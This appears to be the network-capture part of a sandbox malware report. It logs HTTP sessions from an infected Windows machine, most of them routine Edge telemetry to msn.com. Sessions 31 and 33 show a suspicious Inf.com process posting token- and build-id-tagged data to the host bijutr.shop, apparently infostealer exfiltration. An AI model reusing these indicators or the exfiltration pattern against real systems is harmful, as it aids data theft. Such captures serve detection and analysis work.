                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:01:38 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:38 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.5 | 49937 | 18.165.220.57 | 443 | 2372 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:01:36 UTC | 925 | OUT | GET /b?rn=1735279295840&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=3918B198F66063F3328CA4FAF7676296&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-27 06:01:37 UTC | 955 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:37 GMT
                                                                                                                                                                                                                                                                                                  Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                                  Location: /b2?rn=1735279295840&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=3918B198F66063F3328CA4FAF7676296&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
                                                                                                                                                                                                                                                                                                  set-cookie: UID=1AE10fc6589f9ad55d15d371735279297; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                                  set-cookie: XID=1AE10fc6589f9ad55d15d371735279297; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                                  X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                  Via: 1.1 358b28eebad5be133b48dbeaa3a5bbdc.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                  X-Amz-Cf-Pop: BAH53-P1
                                                                                                                                                                                                                                                                                                  X-Amz-Cf-Id: M4eC_RrmNxvkxSTtnjQeBrZZylswBgZ7CLtaSbfzG-msmwhr3lOFPg==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.5 | 49982 | 13.89.178.27 | 443 | 2372 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:01:38 UTC | 1082 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735279295838&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Content-Length: 3869
                                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                  Cookie: _C_ETH=1; USRLOC=; MUID=3918B198F66063F3328CA4FAF7676296; _EDGE_S=F=1&SID=1DDB83DF79F56C08037C96BD787D6D0A; _EDGE_V=1
2024-12-27 06:01:38 UTC | 3869 | OUT | Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 50 61 67 65 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 37 54 30 36 3a 30 31 3a 33 35 2e 38 33 34 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 30 62 33 31 66 37 35 39 2d 61 66 38 39 2d 34 65 35 65 2d 61 62 65 39 2d 36 66 65 66 61 38 64 39 38 65 64 34 22 2c 22 65 70 6f 63 68 22 3a 22 31 38 33 30 38 30 35 39 37 38 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.PageView","time":"2024-12-27T06:01:35.834Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"0b31f759-af89-4e5e-abe9-6fefa8d98ed4","epoch":"1830805978"},"app":{"locale
2024-12-27 06:01:39 UTC | 890 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                  Set-Cookie: MC1=GUID=22def9b2d89c4c3ba58c65ddc50c5df1&HASH=22de&LV=202412&V=4&LU=1735279299043; Domain=.microsoft.com; Expires=Sat, 27 Dec 2025 06:01:39 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                  Set-Cookie: MS0=91caadf1416c474c9f4525975e142cf3; Domain=.microsoft.com; Expires=Fri, 27 Dec 2024 06:31:39 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                  time-delta-millis: 3205
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:38 GMT
                                                                                                                                                                                                                                                                                                  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.5 | 49995 | 18.164.116.98 | 443 | 2372 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:01:39 UTC | 1012 | OUT | GET /b2?rn=1735279295840&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=3918B198F66063F3328CA4FAF7676296&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                  Cookie: UID=1AE10fc6589f9ad55d15d371735279297; XID=1AE10fc6589f9ad55d15d371735279297
2024-12-27 06:01:39 UTC | 326 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:39 GMT
                                                                                                                                                                                                                                                                                                  Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                                  X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                  Via: 1.1 a0be26685e47d6d6220ccd40bc5f0a4e.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                  X-Amz-Cf-Pop: JFK50-P6
                                                                                                                                                                                                                                                                                                  X-Amz-Cf-Id: EKy5t_C6O0MPG5cwXIG_dp30bIdt1seuNoTvIjvC3nvnKVPQ2-TZMw==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.5 | 49997 | 188.245.216.205 | 443 | 1276 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:01:39 UTC | 326 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----47QIWB1DJMYU3EKFUAA1
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: bijutr.shop
                                                                                                                                                                                                                                                                                                  Content-Length: 131557
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
2024-12-27 06:01:39 UTC | 16355 | OUT
Data Ascii: ------47QIWB1DJMYU3EKFUAA1Content-Disposition: form-data; name="token"a9d26c542187b1bd8ffa28120f0b3b8a------47QIWB1DJMYU3EKFUAA1Content-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------47QIWB1DJMYU3EKFUAA1Cont
2024-12-27 06:01:41 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:01:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:01:41 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.5 | 49998 | 20.110.205.119 | 443 | 2372 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:01:40 UTC | 1261 | OUT | GET /c.gif?rnd=1735279295839&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=338156387e954518bddd6ad5da364bdb&activityId=338156387e954518bddd6ad5da364bdb&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=0A6FD663C8E04E24A976289B56E6D1F3&MUID=3918B198F66063F3328CA4FAF7676296 HTTP/1.1
Host: c.msn.com
Connection: keep-alive
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: USRLOC=; MUID=3918B198F66063F3328CA4FAF7676296; _EDGE_S=F=1&SID=1DDB83DF79F56C08037C96BD787D6D0A; _EDGE_V=1; SM=T
2024-12-27 06:01:40 UTC | 982 | IN | HTTP/1.1 200 OK
Cache-Control: private, no-cache, proxy-revalidate, no-store
Pragma: no-cache
Content-Type: image/gif
Last-Modified: Tue, 10 Dec 2024 13:00:24 GMT
Accept-Ranges: bytes
ETag: "9270eb7934bdb1:0"
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure;
Set-Cookie: MUID=3918B198F66063F3328CA4FAF7676296; domain=.msn.com; expires=Wed, 21-Jan-2026 06:01:40 GMT; path=/; SameSite=None; Secure; Priority=High;
Set-Cookie: SRM_M=3918B198F66063F3328CA4FAF7676296; domain=c.msn.com; expires=Wed, 21-Jan-2026 06:01:40 GMT; path=/; SameSite=None; Secure;
Set-Cookie: MR=0; domain=c.msn.com; expires=Fri, 03-Jan-2025 06:01:40 GMT; path=/; SameSite=None; Secure;
Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Fri, 27-Dec-2024 06:11:40 GMT; path=/; SameSite=None; Secure;
Date: Fri, 27 Dec 2024 06:01:40 GMT
Connection: close
Content-Length: 42
2024-12-27 06:01:40 UTC | 42 | IN | Data Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b
Data Ascii: GIF89a!,L;


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.5 | 50004 | 188.245.216.205 | 443 | 1276 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:01:40 UTC | 327 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----GLFCJE3OP8YUAIWLN7GV
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 6990993
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:01:40 UTC | 16355 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 47 4c 46 43 4a 45 33 4f 50 38 59 55 41 49 57 4c 4e 37 47 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 64 32 36 63 35 34 32 31 38 37 62 31 62 64 38 66 66 61 32 38 31 32 30 66 30 62 33 62 38 61 0d 0a 2d 2d 2d 2d 2d 2d 47 4c 46 43 4a 45 33 4f 50 38 59 55 41 49 57 4c 4e 37 47 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 47 4c 46 43 4a 45 33 4f 50 38 59 55 41 49 57 4c 4e 37 47 56 0d 0a 43 6f 6e 74
Data Ascii: ------GLFCJE3OP8YUAIWLN7GVContent-Disposition: form-data; name="token"a9d26c542187b1bd8ffa28120f0b3b8a------GLFCJE3OP8YUAIWLN7GVContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------GLFCJE3OP8YUAIWLN7GVCont
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:40 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:01:48 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
